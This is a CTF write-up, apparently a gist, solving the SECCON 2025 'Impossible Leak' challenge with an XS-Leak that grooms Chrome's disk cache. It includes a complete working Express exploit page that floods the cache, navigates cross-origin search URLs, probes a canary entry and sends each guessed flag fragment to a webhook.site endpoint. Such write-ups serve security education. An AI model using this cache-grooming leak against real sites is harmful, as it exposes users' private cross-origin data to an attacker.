@parrot409
Last active December 30, 2025 06:29
Impossible Leak - SECCON 2025 Quals

XS Leaks using disk cache grooming

The admin bot creates a new browsing context with createBrowsingContext() and uses it to open the page. Each browsing context should have a dedicated disk cache, but how does Chrome handle this? I deduced that it uses an in-memory disk cache, which is much smaller than the default on-disk cache. Incognito tabs in my browser behave the same way.

The following page alerts "not cached" due to a cache miss in incognito mode, but no error occurs in a regular tab.

```sh
$ head /dev/urandom -c 5242880 > chunk
$ cat <<EOF > index.html
<script>
(async _=>{
   for(let i=0;i<20;i++) await fetch('/chunk?'+i)
   try {
       for(let i=0;i<20;i++) await fetch('/chunk?'+i,{cache:'only-if-cached',mode:'same-origin'})
   } catch(e){ alert('not cached') }
})()
</script>
EOF
$ python3 -m http.server 2000
```

The exploit uses the following strategy:

  • push 1 entry of size 1 B
  • push 49 entries of size 1 MB
  • push 599 entries of size 1 KB
  • push //challenge.com/search?query=SECCON&i for i from 0 to 200 via window.location
  • query the disk cache to see whether the first entry we pushed has been purged

We essentially "groom" the disk cache so that there's room for 200 entries from failed queries, but not enough room for 200 entries from successful queries.

The search page is 433 bytes for a failed query and 433 + flag.length bytes when the query matches part of the flag. Over 200 loads this creates a size difference of flag.length * 200 bytes between bad and good searches; for a flag length of 24, that is about 5 KB. A larger gap makes the detection less error-prone.

We can tell whether the cache was overfilled by successful queries by probing the first inserted 1-byte entry: once the cache limit is reached, the oldest entry gets evicted. Chromium's eviction logic is presumably more complex than that, but in my testing it consistently evicted the oldest entry once the limit was hit.

I believe this technique can be reused against other xsleaks search challenges where caching is not disabled on the search page. The downside is that it leaks only one state per run. It may be possible to test multiple queries per run by clearing the cache or using a similar reset mechanism.

```javascript
const express = require("express");
const app = express();
app.use(express.json());

// 1 MB filler entries
app.get("/gg", (req, res) => {
  res.send("A".repeat(1 * 1024 * 1024));
});

// 1-byte canary entry (probed later to detect eviction)
app.get("/rr", (req, res) => {
  res.send("A".repeat(1));
});

// 1 KB filler entries
app.get("/vaaa", (req, res) => {
  console.log(req.query);
  res.send("A".repeat(1024));
});

app.get("/", (req, res) => {
  if (!req.query.prefix || !req.query.check) return res.send("no");
  console.log("bot");
  res.send(`
<script>
let x = window.open()
const flag = '${req.query.prefix}'
const check = '${req.query.check}'
async function df(){
  console.log('doing')
  // canary: the first (oldest) cache entry, 1 byte
  await fetch('/rr',{cache:'force-cache'})
  // grooming: 49 x 1 MB + 599 x 1 KB entries
  for(i=0;i<49;i++) fetch('http://xxx.xx.xxx.xx:5000/gg?'+i+'&'+'A'.repeat(52-flag.length),{cache:'force-cache'})
  for(i=0;i<599;i++) fetch('http://xxx.xx.xxx.xx:5000/vaaa?'+i+'&'+'A'.repeat(52-flag.length),{cache:'force-cache'})
  await new Promise(r => setTimeout(r, 10000)); // wait 10 s for the grooming fetches to land
  // 200 cross-origin search loads, padded so every URL has the same length
  for(i=0;i<200;i++){
    let u = 'http://web:3000/?query='+flag+check+'&'+i+'&'
    x.location = u.padEnd(87,'A')
    await new Promise(r => setTimeout(r, 30)); // 30 ms between navigations
  }
  try{
    // probe: if the canary is still cached, the searches did not overflow the cache
    await fetch('/rr',{cache: 'only-if-cached', mode: 'same-origin' })
    fetch('https://webhook.site/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?not-correct-${req.query.prefix + req.query.check}')
  } catch(e){
    fetch('https://webhook.site/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx?found-${req.query.prefix + req.query.check}')
  }
  console.log('done')
}
df()
</script>
`);
});

app.listen(5000);